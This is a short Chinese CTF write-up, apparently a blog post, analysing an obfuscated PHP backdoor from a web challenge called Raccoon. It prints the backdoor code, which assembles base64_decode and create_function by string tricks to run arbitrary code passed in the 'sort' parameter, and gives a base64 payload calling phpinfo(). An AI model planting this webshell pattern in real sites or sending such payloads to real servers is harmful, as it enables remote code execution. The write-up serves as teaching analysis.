Raccoon——(Web)PHP 后门分析writeup

题目
网页源代码如下:(我已经备注了很详细的注释)

<?php 
	$z0=$_REQUEST['sort'];
	$q1='';
	$c2="wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";
	$y3=array(8,38,15,7,6,4,26,25,7,34,24,25,7);
	foreach($y3 as $h4){$q1.=$c2[$h4];}   //foreach循环    q1=base64_decode
	$v5=strrev("noi"."tcnuf"."_eta"."erc");  //strrev反转字符串  create_function('参数','函数体代码')函数主要用来创建匿名函数,
	$j6=$v5("",$q1($z0));    // j6 = create_function("",base64_decode(sort))
	$j6();   //空函数,就是在执行匿名函数的  函数体代码,要想执行phpinfo函数,于是要将    phpinfo();   进行 base64加密后 传给sort参数
	              //  sort=cGhwaW5mbygpOw==
//foreach (array_expression as $value)
//第一种:遍历给定的 数组语句 array_expression 数组。
//每次循环中,当前单元的值被赋给 $value 并且数组内部的指针向前移一步(因此下一次循环中将会得到下一个单元)。
//foreach (array_expression as $key => $value)
//第二种:同上,同时当前单元的键名也会在每次循环中被赋给变量 $key。	
	
	
	
?>
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值